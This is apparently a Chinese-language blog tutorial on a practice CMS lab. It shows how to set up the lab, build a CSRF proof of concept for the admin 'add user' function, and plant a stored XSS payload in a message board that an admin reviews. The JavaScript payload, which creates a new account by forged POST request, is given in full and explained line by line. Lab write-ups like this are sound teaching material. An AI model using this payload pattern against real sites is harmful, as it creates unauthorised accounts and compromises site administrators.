CSRF+XSS组合攻击实战

目录

0x01安装靶场

0x02分析功能点的请求接口,构造恶意请求

0x03寻找xss漏洞


0x01安装靶场

下载源码,解压到网站根目录

1.修改数据库配置文件

打开源码,进入到include目录下,打开数据库配置文件database.inc.php

将数据库的用户名和密码修改为自己数据库的用户名和密码,数据库名可以不改。然后保存。

2.导入SQL文件

方法一:使用Navicat导入

打开navicate,新建数据库,名字写为刚才我们上面的数据库名,若没有修改,数据库名就是cms

右键点击我们刚才的数据库,选择运行SQL文件(若右键之后,运行SQL文件是灰色的,则先点击打开数据库)

选择源码下的install.sql文件

然后浏览器打开访问网站。

方法二:命令行方式导入

打开命令行,win+r,输入cmd,回车,在命令行界面输入mysql -u root -p

输入密码。

创建数据库 creat database cms

选中数据库use cms,导入sql文件,source sql文件地址

例如:source D:\phpstudy_pro\WWW\cms\install.sql

导入成功,打开浏览器访问网站。

访问路径:域名\cms\index.php

0x02分析功能点的请求接口,构造恶意请求

进入后台管理界面找到添加用户的功能点,进行抓包分析

管理员用户名admin,密码123456

添加用户,进行抓包

右键利用burpsuite自带的csrfPOC生成工具生成

把这个复制写到一个页面上,在登录到那个cms管理员账户的情况下,访问这个页面,就会发现用户里面多了一条用户记录。由于CSRF利用条件比较苛刻,需要受害者点击恶意请求。因此我们可需要借助XSS来扩大危害,借用XSS漏洞执行JS代码,让JS直接发起请求,从而不需要让受害者点击恶意请求了。

0x03寻找xss漏洞

编写恶意JS代码

<script> xmlhttp = new XMLHttpRequest(); xmlhttp.open("post","http://localhost:8083/cms/admin/user.action.php",false); xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded"); xmlhttp.send("act=add&username=zhang&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0"); </script>

代码说明

复制代码
xmlhttp = new XMLHttpRequest(); 
  • 创建 XMLHttpRequest 对象XMLHttpRequest 是 JavaScript 用于与服务器进行交互的对象。在这里,创建了一个新的 XMLHttpRequest 对象 xmlhttp
复制代码
xmlhttp.open("post", "http://localhost:8083/cms/admin/user.action.php", false);
  • 初始化请求

    • open() 方法用于初始化一个请求。这里指定了请求方法为 POST

    • 第一个参数 "post" 表示 HTTP 请求的方法是 POST。

    • 第二个参数 http://localhost:8083/cms/admin/user.action.php 是请求的 URL。

    • 第三个参数 false 表示同步请求(阻塞调用),即 JavaScript 执行将暂停,直到请求完成。

复制代码
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  • 设置请求头setRequestHeader() 方法用于设置 HTTP 请求头。这里设置 Content-typeapplication/x-www-form-urlencoded,表示发送的数据将按照表单 URL 编码的方式进行编码。
复制代码
xmlhttp.send("act=add&username=yuanboss&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");
  • 发送请求

    复制代码
    send()

    方法用于发送 HTTP 请求。这里发送的数据是一个 URL 编码的字符串:

    • "act=add":操作类型是"add",表示要添加一个用户。

    • "username=zhang":用户名是"zhang"。

    • "password=123456""password2=123456":密码是"123456",两次确认输入。

    • "button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7":提交按钮的值,URL 解码后是"添加用户"。

    • "userid=0":用户 ID 为0,通常表示新用户。

通过查询cms靶场,找到了一个留言板,因为留言板需要管理员去审核,所以可以进行一个存储型xss注入。

在留言板留言我们刚才构造的恶意JS代码,进行xss+csrf组合攻击

模仿管理员去审核留言

打开账号管理,查看账号

多了一条用户名为张的用户记录。

相关推荐
企鹅侠客2 分钟前
ETCD调优
数据库·etcd
Json_181790144809 分钟前
电商拍立淘按图搜索API接口系列,文档说明参考
前端·数据库
煎饼小狗20 分钟前
Redis五大基本类型——Zset有序集合命令详解(命令用法详解+思维导图详解)
数据库·redis·缓存
永乐春秋37 分钟前
WEB-通用漏洞&SQL注入&CTF&二次&堆叠&DNS带外
数据库·sql
打鱼又晒网1 小时前
【MySQL】数据库精细化讲解:内置函数知识穿透与深度学习解析
数据库·mysql
大白要努力!1 小时前
android 使用SQLiteOpenHelper 如何优化数据库的性能
android·数据库·oracle
tatasix2 小时前
MySQL UPDATE语句执行链路解析
数据库·mysql
南城花随雪。2 小时前
硬盘(HDD)与固态硬盘(SSD)详细解读
数据库
儿时可乖了2 小时前
使用 Java 操作 SQLite 数据库
java·数据库·sqlite
懒是一种态度2 小时前
Golang 调用 mongodb 的函数
数据库·mongodb·golang